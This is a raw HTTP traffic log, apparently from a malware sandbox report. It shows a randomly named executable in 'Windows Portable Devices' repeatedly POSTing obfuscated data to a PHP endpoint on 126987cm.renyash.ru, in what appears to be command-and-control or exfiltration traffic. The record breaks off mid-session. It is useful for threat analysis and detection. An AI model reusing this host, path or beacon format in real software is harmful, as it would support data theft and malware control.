                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:28.876835108 CET1064OUTData Raw: 51 52 5e 54 56 4a 59 5e 5d 56 5b 57 54 5c 51 5a 58 50 58 59 5b 52 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QR^TVJY^]V[WT\QZXPXY[RWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$"/Y 1>5>,0-3!'?$;Q"%7$:]>)>. Z&!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:28.978311062 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:29.232832909 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Onmfjv%2BE9Co6ccJd31npGUI4aDB1EF8fNPiUm1Es48G3g2tQJkpL972u4VhrZZrGoPaWXBZNqr%2FdVDYm5q63sxA19b68xoLmo6o7EnyvNqEqizsOFduBbSGrQg10FI3HH11HlH8D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ed4cbee42cd-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4480&min_rtt=1579&rtt_var=6396&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=58885&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                85192.168.2.450050172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:29.498138905 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:29.842928886 CET1072OUTData Raw: 54 57 5b 54 53 44 5c 53 5d 56 5b 57 54 5b 51 5b 58 55 58 5a 5b 53 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW[TSD\S]V[WT[Q[XUXZ[SWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'X4=Z5$$/"<++"%<' .Z>&%E(X4^1!^&%X*
                                                                                                                                Jan 1, 2025 21:48:29.969917059 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:30.377978086 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lj%2FrYAvl84x%2BOZ8nJ%2FFgfksww5iQwFkKBXUiCL2xuY1qszepafTMSlmZH%2FUtYKkZTNTctJQ619aqkCZXrIl6RWM37BbF39vw0h17aZqDLwmLp%2Fbe34kpufAB9lBFsZaGZNkp%2Fg2A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55edafa60f78d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4092&min_rtt=1805&rtt_var=5252&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=72611&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                86192.168.2.450056172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:30.500037909 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:30.858680964 CET1072OUTData Raw: 54 57 5e 52 56 44 59 57 5d 56 5b 57 54 5b 51 5d 58 57 58 50 5b 50 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW^RVDYW]V[WT[Q]XWXP[PWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y$T;X 1[!,$=/5*'<"%$V$2*6"(=7%:!^&%X*
                                                                                                                                Jan 1, 2025 21:48:30.972232103 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:31.147048950 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9Qvkolkn9XWA3aCDnyFmVqfGIjp1q0h1y5mBhqE8C9sZn7BE%2B9wAvnjFpYC2z%2BMUuQbtUkAxHwfVqcgAeCSsUWVGV0Ww13z65E6fpEEGEddouZxJK9LBWTM%2B61VxbJst6Wir2S%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ee139914408-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3628&min_rtt=1606&rtt_var=4647&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=82077&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                87192.168.2.450061172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:31.161917925 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1772
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:31.514938116 CET1772OUTData Raw: 54 5e 5b 52 56 46 59 57 5d 56 5b 57 54 5c 51 52 58 56 58 50 5b 5e 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[RVFYW]V[WT\QRXVXP[^WHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["''Y"!"5-#0"+<P#6<S3%>%&+-;%:!^&%X*
                                                                                                                                Jan 1, 2025 21:48:31.608020067 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:31.901730061 CET951INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYbYMwnR36DlgpwIx0Oe9EzTE8JxfsmT9rzaykGqTLbdNALX097GKIF5xB4CNDvN8bGtEU1WCUd9EJMgFeCyNeeBNejcDwl55std8g2Mp9JC9EW4MsE5Gw4dGwo511s%2FUfaC6BCf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ee53a604391-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3594&min_rtt=1591&rtt_var=4603&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2117&delivery_rate=82874&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 54 28 1f 38 0e 37 32 21 1e 29 3b 2b 5f 31 32 2e 1f 25 30 21 41 3c 01 27 5e 2b 11 23 0b 32 5a 24 17 24 39 3d 1b 3c 32 20 5b 2b 36 20 5c 05 1b 3a 05 24 39 2c 02 25 28 39 56 3d 0e 02 58 34 2c 39 06 3e 0d 3c 51 21 28 36 01 26 38 07 52 33 04 31 0d 2b 12 33 5f 3e 56 3f 50 24 3d 2a 51 0f 16 38 53 2a 09 3e 58 2a 12 05 06 33 0f 0e 5b 22 36 25 54 31 05 38 0a 26 2a 25 03 2b 10 3c 0e 35 30 27 57 25 5a 31 00 26 3e 2c 0c 3a 00 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!T(872!);+_12.%0!A<'^+#2Z$$9=<2 [+6 \:$9,%(9V=X4,9><Q!(6&8R31+3_>V?P$=*Q8S*>X*3["6%T18&*%+<50'W%Z1&>,:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                88192.168.2.450062172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:31.266024113 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:31.624171972 CET1072OUTData Raw: 54 53 5b 57 53 41 5c 53 5d 56 5b 57 54 5a 51 58 58 53 58 5a 5b 52 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[WSA\S]V[WTZQXXSXZ[RWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$2#"!$[$Y"+7T+3"5+0#.Y)6<>01:!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:31.710890055 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:32.005961895 CET815INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDys2x0mh4%2FwEK3jv5qPRM3ib8oUizkvEWIAA%2FoasSL%2Bq53e8istWV6li%2Bzq7MFO0AgISazPv7W3Z2ir%2FvcBKJou8X6j1wykd%2FOPUvtkF2nFFciwr%2FmY5XL%2B9iEgHmNDU4THqyru"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ee5ecf9c352-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2349&min_rtt=1694&rtt_var=1945&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=210495&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                89192.168.2.450070172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:32.178736925 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:32.530608892 CET1072OUTData Raw: 54 54 5b 5f 56 45 59 57 5d 56 5b 57 54 55 51 58 58 53 58 5c 5b 55 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[_VEYW]V[WTUQXXSX\[UWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["03_#!!\ .3/"8+47"W3V9*&(><Z':!^&%X*
                                                                                                                                Jan 1, 2025 21:48:32.642127037 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:32.906758070 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fyguYkhor2soWkc3aIv72097Nyb34TY58dpWcZxEQn0tT%2F8BW8jngtC%2FyM1X%2FsJ0F9p6i6z%2BF1bK8ah6swpTgITN9vQG3aZVpjGzeoR6ZX4wK02sYbq5V4i98078L1UvfX2jfRpM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55eebbf354322-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3629&min_rtt=1586&rtt_var=4682&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=81405&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                90192.168.2.450076172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:33.039402008 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:33.389849901 CET1072OUTData Raw: 51 56 5e 57 56 42 59 55 5d 56 5b 57 54 5f 51 5e 58 56 58 5c 5b 5e 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV^WVBYU]V[WT_Q^XVX\[^WCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["01, !!Z!<0=#5]<+U5%%3&X)@=(?%!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:33.508472919 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:33.786330938 CET816INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FWQAf%2FttnMRTaUHcRv%2B2HREUDBRx2TY8d73r4LROQZiDWH%2Fx3%2FdSPY7RQRrU0TbaXcyktXxQnGP3d83yrh5kx%2Bt28ag1jG%2By1%2B5b1nspbIXusLJob7MuO2B7OpYn0JycvS1%2FEotG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ef11fcdc324-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4847&min_rtt=1695&rtt_var=6939&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=54252&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                91192.168.2.450082172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:33.905030012 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:34.249186039 CET1072OUTData Raw: 54 50 5e 53 56 4a 59 57 5d 56 5b 57 54 5d 51 5e 58 52 58 5e 5b 56 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^SVJYW]V[WT]Q^XRX^[VWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[![02;^49"X?['-/57U?'$"S$ )*<>42*!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:34.348190069 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:34.626310110 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnmBKmMOR5ptIGKv5ceCl4KnPclc0qf0%2BWo8rmoDvZkRlrAevS6VFJ4sOOoNJkmilkrztvjNnZbuRNzMCVvKXf98zqpMA8dK5gzNcMoHYw5NkP%2FrcyYeTQtYPB0q1JRw2jArDXjD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55ef66c35f5f6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2857&min_rtt=1645&rtt_var=3041&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=128725&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                92192.168.2.450088172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:34.803487062 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:35.163047075 CET1072OUTData Raw: 54 56 5e 53 56 40 59 57 5d 56 5b 57 54 55 51 59 58 5c 58 58 5b 52 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV^SV@YW]V[WTUQYX\XX[RWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'"_#!]6'^3=;!](($+P"4V%0!(&?.(':!^&%X*
                                                                                                                                Jan 1, 2025 21:48:35.247693062 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:35.505773067 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zdfxq2JKabs62nWpI%2FnjLbiCshMNHf2230MDAWWU5oTiosG38Q1FVHBdFVYN7KfF1RjIAuWdejOW5yCp88rshk5WhZAFOPKbzgsbckWomLCcclDhHxMD49YTguLH%2FioN28e2x7gN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55efbffbd435b-EWR
